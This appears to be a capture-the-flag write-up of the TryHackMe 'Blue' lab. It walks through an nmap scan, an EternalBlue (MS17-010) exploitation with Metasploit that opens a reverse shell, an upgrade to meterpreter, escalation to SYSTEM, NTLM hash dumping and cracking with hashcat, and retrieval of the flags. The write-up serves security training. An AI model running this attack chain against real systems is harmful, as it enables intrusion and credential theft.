TryHackMe - Blue
April 12, 2020•3,481 words
Prerequisite
$ export IP=THM_VPN_IP
TASK 1 - RECON
1. Scan the machine
The command below kicks off the nmap scan into a portScan dir output = all formats.
$ sudo nmap -sC -sV -vvv -oA ./portScan/nmap-initial $IP
Nmap scan report for 10.10.0.135
Host is up, received echo-reply ttl 127 (0.050s latency).
Scanned at 2020-04-12 12:48:35 BST for 137s
Not shown: 991 closed ports
Reason: 991 resets
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped syn-ack ttl 127
|_ssl-date: 2020-04-12T11:49:53+00:00; +1s from scanner time.
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49158/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49159/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h15m01s, deviation: 2h30m00s, median: 0s
| nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:09:52:93:bf:3a (unknown)
| Names:
| JON-PC<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| JON-PC<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| Statistics:
| 02 09 52 93 bf 3a 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 62444/tcp): CLEAN (Couldn't connect)
| Check 2 (port 34185/tcp): CLEAN (Couldn't connect)
| Check 3 (port 22744/udp): CLEAN (Timeout)
| Check 4 (port 44981/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-04-12T06:49:38-05:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-04-12T11:49:38
|_ start_date: 2020-04-12T09:42:45
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 12 12:50:52 2020 -- 1 IP address (1 host up) scanned in 137.96 seconds
2. How many ports are open with a port number under 1000?
135/tcp
139/tcp
445/tcp
The correct answer for this question was 3.
3. What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
As this machine is call Blue, it was safe to assume the answer would be eternal blue which is:
ms-17-010
TASK 2 -GAIN ACCESS
1. Start Metasploit
$ sudo msfdb run
2. Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........).
Within metasploit we search for eternal blue to identify all the matching modules.
msf5 > search eternalblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
As can be see from above there are 4No. exploits (#2-5).
The correct answer for this question was #2.
exploit/windows/smb/ms17_010_eternalblue
3. Show options and set the one required value. What is the name of this value? (All caps for submission). Following on from the above command we can determine the answer.
msf5 > use 2
msf5 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) >
The answer appears to be RHOSTS, however, when entering this into the submission box it was incorrect. The answer they were looking for was RHOST, maybe this was just a glitch in the matrix??
4. Run the exploit.
Before running the exploit we need to set our LHOST and LPORT.
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS THM_VPN_IP
RHOSTS => THM_VPN_IP
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444
Carrying on our command workflow we attempt to exploit the machine.
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on THM_VPN_IP:4444
[*] THM_VPN_IP:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] THM_VPN_IP:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] THM_VPN_IP:445 - Scanned 1 of 1 hosts (100% complete)
[*] THM_VPN_IP:445 - Connecting to target for exploitation.
[+] THM_VPN_IP:445 - Connection established for exploitation.
[+] THM_VPN_IP:445 - Target OS selected valid for OS indicated by SMB reply
[*] THM_VPN_IP:445 - CORE raw buffer dump (42 bytes)
[*] THM_VPN_IP:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] THM_VPN_IP:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] THM_VPN_IP:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] THM_VPN_IP:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] THM_VPN_IP:445 - Trying exploit with 12 Groom Allocations.
[*] THM_VPN_IP:445 - Sending all but last fragment of exploit packet
[*] THM_VPN_IP:445 - Starting non-paged pool grooming
[+] THM_VPN_IP:445 - Sending SMBv2 buffers
[+] THM_VPN_IP:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] THM_VPN_IP:445 - Sending final SMBv2 buffers.
[*] THM_VPN_IP:445 - Sending last fragment of exploit packet!
[*] THM_VPN_IP:445 - Receiving response from exploit packet
[+] THM_VPN_IP:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] THM_VPN_IP:445 - Sending egg to corrupted connection.
[*] THM_VPN_IP:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (THM_VPN_IP:4444 -> 10.1.0.135:49175) at 2020-04-12 13:50:08 +0100
[+] THM_VPN_IP:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] THM_VPN_IP:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] THM_VPN_IP:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
C:\Windows\system32>^Z
Background session 1? [y/N] y
5. Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
The exploit came through blank, however, by pressing RETURN we can now see the DOS prompt of the exploited machine indicated above.
TASK 3 - ESCALATION
1. If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected).
C:\Windows\system32>^Z
Background session 1? [y/N] y
msf5 > grep meterpreter search shell
273 payload/android/meterpreter_reverse_http normal No Android Meterpreter Shell, Reverse HTTP Inline
274 payload/android/meterpreter_reverse_https normal No Android Meterpreter Shell, Reverse HTTPS Inline
275 payload/android/meterpreter_reverse_tcp normal No Android Meterpreter Shell, Reverse TCP Inline
439 payload/osx/x64/meterpreter/bind_tcp normal No OSX Meterpreter, Bind TCP Stager
440 payload/osx/x64/meterpreter/reverse_tcp normal No OSX Meterpreter, Reverse TCP Stager
459 payload/python/meterpreter_bind_tcp normal No Python Meterpreter Shell, Bind TCP Inline
460 payload/python/meterpreter_reverse_http normal No Python Meterpreter Shell, Reverse HTTP Inline
461 payload/python/meterpreter_reverse_https normal No Python Meterpreter Shell, Reverse HTTPS Inline
462 payload/python/meterpreter_reverse_tcp normal No Python Meterpreter Shell, Reverse TCP Inline
482 payload/windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
483 payload/windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
484 payload/windows/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline
485 payload/windows/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline
486 payload/windows/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline
487 payload/windows/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline
488 payload/windows/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
489 payload/windows/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline
492 payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
493 payload/windows/patchupmeterpreter/bind_hidden_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
524 payload/windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
525 payload/windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64)
526 payload/windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64)
527 payload/windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
528 payload/windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
529 payload/windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64
566 post/multi/manage/shell_to_meterpreter normal No Shell to Meterpreter Upgrade
msf5 >
The module required to upgrade a standard shell to a meterpreter session is post/multi/manage/shell_to_meterpreter
2. Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer).
Carrying on our command workflow we select the correct module and list the options.
msf5 > use 566
msf5 post(multi/manage/shell_to_meterpreter) > options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on.
msf5 post(multi/manage/shell_to_meterpreter) >
The options required for this module to function is SESSION.
3. Set the required option, you may need to list all of the sessions to find your target here.
msf5 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... THM_VPN_IP:4444 -> 10.10.55.106:49175 (10.10.55.106)
msf5 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
4. Run! If this doesn't work, try completing the exploit from the previous task once more.
msf5 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on THM_VPN_IP:4433
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (180291 bytes) to THM_VPN_IP
[*] Meterpreter session 2 opened (THM_VPN_IP:4433 -> 10.1.0.135:49171) at 2020-04-12 14:52:56 +0100
[*] Stopping exploit/multi/handler
msf5 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... THM_VPN_IP:4444 -> 10.1.0.135:49168 (10.10.27.96)
2 meterpreter x86/windows NT AUTHORITY\SYSTEM @ JON-PC THM_VPN_IP:4433 -> 10.1.0.135:49171 (10.10.27.96)
5. Once the meterpreter shell conversion completes, select that session for use.
msf5 post(multi/manage/shell_to_meterpreter) > sessions -h
Usage: sessions [options] or sessions [id]
Active session manipulation and interaction.
OPTIONS:
-C <opt> Run a Meterpreter Command on the session given with -i, or all
-K Terminate all sessions
-S <opt> Row search filter.
-c <opt> Run a command on the session given with -i, or all
-d List all inactive sessions
-h Help banner
-i <opt> Interact with the supplied session ID
-k <opt> Terminate sessions by session ID and/or range
-l List all active sessions
-n <opt> Name or rename a session by ID
-q Quiet mode
-s <opt> Run a script or module on the session given with -i, or all
-t <opt> Set a response timeout (default: 15)
-u <opt> Upgrade a shell to a meterpreter session on many platforms
-v List all active sessions in verbose mode
-x Show extended information in the session table
Many options allow specifying session ranges using commas and dashes.
For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
msf5 post(multi/manage/shell_to_meterpreter) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... THM_VPN_IP:4444 -> 10.1.0.135:49168 (10.10.81.119)
2 meterpreter x86/windows NT AUTHORITY\SYSTEM @ JON-PC THM_VPN_IP:4433 -> 10.1.0.135:49172 (10.10.81.119)
msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
6. Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
Process 1120 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
7. List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).
C:\Windows\system32>^Z
Background channel 1? [y/N] y
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
444 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
556 548 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
604 548 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
616 596 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
656 596 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
704 604 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
712 604 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
720 604 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
772 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
828 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
896 704 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
944 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1012 656 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe
1076 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1120 2520 cmd.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\cmd.exe
1156 704 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1292 704 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1336 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1388 556 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
1412 704 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1476 704 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe
1596 704 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
1612 704 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
1724 772 WMIADAP.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WMIADAP.exe
1936 704 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2044 1292 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\cmd.exe
2056 772 taskeng.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\taskeng.exe
2060 828 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
2068 828 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
2160 556 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
2392 2384 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2520 2392 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
2600 704 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
2640 556 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
2760 704 mscorsvw.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
2784 704 mscorsvw.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
2820 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2852 704 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
2892 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2952 704 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
meterpreter >
8. Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.
meterpreter > migrate 2892
[*] Migrating from 2520 to 2892...
[*] Migration completed successfully.
meterpreter >
TASK 4 - CRACKING
1. Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter >
2. Copy this password hash to a file and research how to crack it. What is the cracked password?
We first need to clean up the hash to match how hashcat wants to receive the hash, examples of the hashes can be found here. Basically, we need to remove everything apart from the last part of the hash, ensuring to remove every : too.
Original - HASH
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Hashcat - HASH
ffb43f0de35be4d9917ac0cc8ad57f8d
To confirm the hash is correct we can use hashid, note we are feeding in the modified hash which is saved in a file (ntlm.txt).
> hashid -m < ntlm.txt
Analyzing 'ffb43f0de35be4d9917ac0cc8ad57f8d'
[+] MD2
[+] MD5 [Hashcat Mode: 0]
[+] MD4 [Hashcat Mode: 900]
[+] Double MD5 [Hashcat Mode: 2600]
[+] LM [Hashcat Mode: 3000]
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5 [Hashcat Mode: 8600]
[+] Skype [Hashcat Mode: 23]
[+] Snefru-128
[+] NTLM [Hashcat Mode: 1000]
[+] Domain Cached Credentials [Hashcat Mode: 1100]
[+] Domain Cached Credentials 2 [Hashcat Mode: 2100]
[+] DNSSEC(NSEC3) [Hashcat Mode: 8300]
[+] RAdmin v2.x [Hashcat Mode: 9900]
>
The hash appears to be correct and using the -m switch of hashid also shows the mode we need to use for hashcat, 1000.
Below is the hashcat command, where using the backticks we can run a command to feed into the hashcat command; furthermore, we are using rockyou.txt as our wordlist.
--force - hashcat used in a VM
-a - indicated wordlist mode
-o - outputs the cracked passwords to a file called cracked.txt.
> hashcat -m 1000 -a 0 `cat ntlm.txt` /usr/share/wordlists/rockyou.txt --force -o cracked.txt
hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel Core Processor (Skylake, IBRS), 2048/5918 MB allocatable, 4MCU
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=1000 -D _unroll'
* Device #1: Kernel m01000_a0-pure.ad7daebd.kernel not found in cache! Building may take a while...
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
### * Runtime...: 2 secs
Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: ffb43f0de35be4d9917ac0cc8ad57f8d
Time.Started.....: Sun Apr 12 15:34:56 2020 (4 secs)
Time.Estimated...: Sun Apr 12 15:35:00 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2885.2 kH/s (0.29ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10203136/14344385 (71.13%)
Rejected.........: 0/10203136 (0.00%)
Restore.Point....: 10199040/14344385 (71.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: alsinah -> alonsouriel
Started: Sun Apr 12 15:34:46 2020
Stopped: Sun Apr 12 15:35:01 2020
> cat cracked.txt
ffb43f0de35be4d9917ac0cc8ad57f8d:PASSWORDHERE
>
TASK 5 - FIND FLAGS!
1. Flag1? (Only submit the flag contents {CONTENTS})
We can use meterpreter to search for the flag files.
meterpreter > search -f flag*
Found 6 results...
c:\flag1.txt (24 bytes)
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag1.lnk (482 bytes)
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag2.lnk (848 bytes)
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag3.lnk (2344 bytes)
c:\Users\Jon\Documents\flag3.txt (37 bytes)
c:\Windows\System32\config\flag2.txt (34 bytes)
meterpreter >
We can see above that all three flag files are found; we just need to read them now.
c:\>more flag1.txt
more flag1.txt
flag{FLAG1}
2. Flag2? *Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare,however, it can happen.
c:\Windows\System32\config>more flag2.txt
more flag2.txt
flag{FLAG2}
3. Flag3?
C:\Users\Jon\Documents>more flag3.txt
more flag3.txt
flag{FLAG3}